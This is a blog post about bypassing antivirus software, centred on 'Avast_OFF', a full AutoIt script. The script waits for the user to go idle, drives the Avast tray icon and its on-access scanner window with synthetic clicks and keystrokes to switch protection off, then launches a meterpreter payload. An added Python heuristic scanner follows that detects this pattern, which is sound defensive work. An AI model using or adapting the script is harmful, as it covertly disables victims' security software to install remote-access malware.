After a four-part investigation / introduction ("I was working on tutorials") to bypassing anti-virus, an update to the target product slapped me in the face, halting the mechanisms I had used for circumvention. I needed a solution that would let me continue with my deployment of meterpreter, and Avast_OFF is what I came up with.

I was looking for some way, any way, to bypass the product in question, just to see how easy it was with today's tools. I had seen AutoIT used in the past and it offered everything I needed: "an easy way to program GUI interaction without learning to program". Most applications are designed to interact with the end user, and anti-virus products are no different, so using AutoIT to mimic the user's actions should work. So long as the anti-virus product allows us to execute and the user behaves as expected, the result is the same: my payload is delivered and I get the shell I'm really after.

[The script]
-----CUT-----
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_icon=..\..\..\..\Program Files\AutoIt3\Icons\filetype-blank.ico
#AutoIt3Wrapper_UseUpx=n
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include "SysTray_UDF.au3"
#include <Timer.au3> ; standard UDF that provides _Timer_GetIdleTime() (the include name was missing from the post as published)
$ApplicationX = "ashDisp.exe" ; tray process of the product's on-access scanner
Global $iIdleTime = _Timer_GetIdleTime()
; Wait for 60 seconds of inactivity before touching the GUI.
While $iIdleTime < 60000
    Sleep(1000)
    $iIdleTime = _Timer_GetIdleTime()
WEnd
MsgBox(0, "I think we're alone", "If you left me longer than 60 seconds you're in for it [" & $iIdleTime & "]", 2, 0)
; Remember the cursor position so it can be restored afterwards.
$MouseReturn = MouseGetPos()
$class = "classname=Shell_TrayWnd"
$hControl = ControlGetHandle($class, "", "Button1")
; Get the tray position and move there.
$posTray = WinGetPos(_FindTrayToolbarWindow())
MouseMove($posTray[0], $posTray[1])
; If the XP "Hide Inactive Icons" mode is active, expand the tray first.
If $hControl <> "" And ControlCommand($class, "", $hControl, "IsVisible", "") Then
    ControlClick($class, "", $hControl)
    Sleep(1000)
EndIf
$index = _SysTrayIconIndex($ApplicationX)
If $index <> -1 Then
    $pos = _SysTrayIconPos($index)
    If $pos = -1 Then
        MsgBox(0, "Not Found", $ApplicationX, 30, 0)
        Exit
    Else
        ; Click the tray icon, then drive the product's dialog with keystrokes.
        MouseMove($pos[0], $pos[1])
        MouseClick("left")
        Sleep(500)
        If Not WinActive("avast! On-Access Scanner", "") Then WinActivate("avast! On-Access Scanner", "")
        WinWaitActive("avast! On-Access Scanner", "")
        Send("{ALTDOWN}t{ALTUP}")
        Sleep(500)
        Send("y")
        Sleep(500)
        Send("{ALTDOWN}o{ALTUP}")
    EndIf
EndIf
; Put the cursor back where the user left it.
MouseMove($MouseReturn[0], $MouseReturn[1])
Sleep(3000)
MsgBox(0, "so far so good!", "with any luck AV is now off and the payload is about to be launched", 4, 0)
Run("meterpreter.exe", "", "")
-----CUT-----
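From the defender's side, the script above is a recognisable pattern: an idle-time gate, tray automation, synthetic keystrokes aimed at a security product's window, then a process launch. The following is an added example, not part of the original post, of a small heuristic scanner over AutoIt source text that flags that combination; the indicator regexes, the `SAMPLE_SCRIPT` fragment and the verdict thresholds are all constructed here, and the only product window title it knows is the one named in the post.

```python
import re

# Constructed sample: a condensed fragment in the style of the post's script.
SAMPLE_SCRIPT = """\
Global $iIdleTime = _Timer_GetIdleTime()
While $iIdleTime < 60000
Sleep(1000)
$iIdleTime = _Timer_GetIdleTime()
WEnd
$index = _SysTrayIconIndex("ashDisp.exe")
MouseClick("left")
WinWaitActive("avast! On-Access Scanner","")
Send("{ALTDOWN}t{ALTUP}")
Run("payload.exe","","")
"""

# Indicator name -> regex over the script text (matched case-insensitively).
# Window-title fragments are an assumption; extend with other products as needed.
INDICATORS = {
    "idle_gating": r"_Timer_GetIdleTime\s*\(",
    "tray_automation": r"_SysTrayIcon(Index|Pos)\s*\(",
    "synthetic_input": r"\b(Send|ControlSend|ControlClick|MouseClick)\s*\(",
    "security_window": r"Win(Activate|WaitActive|Active)\s*\(\s*\"[^\"]*"
                       r"(avast|on-access scanner)[^\"]*\"",
    "launches_binary": r"\bRun\s*\(",
}


def scan_autoit(text):
    """Return which indicators fire, a score, and a verdict for one script."""
    found = {name: bool(re.search(rx, text, re.IGNORECASE))
             for name, rx in INDICATORS.items()}
    # Core pattern: synthetic input directed at a security product's window.
    core = found["synthetic_input"] and found["security_window"]
    score = sum(found.values())
    if core:
        verdict = "gui_av_tamper"
    elif score >= 3:
        verdict = "suspicious"
    else:
        verdict = "no_match"
    return {"indicators": found, "score": score, "verdict": verdict}


if __name__ == "__main__":
    print(scan_autoit(SAMPLE_SCRIPT))
```

Run it against decompiled or captured .au3 sources; a compiled AutoIt binary would first need its script extracted, which this example does not cover.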

There is nothing new in this information; it was just an exercise for myself, but this is my only blog, so I have posted the code here.

© 2019 Created by Marcus J. Carey.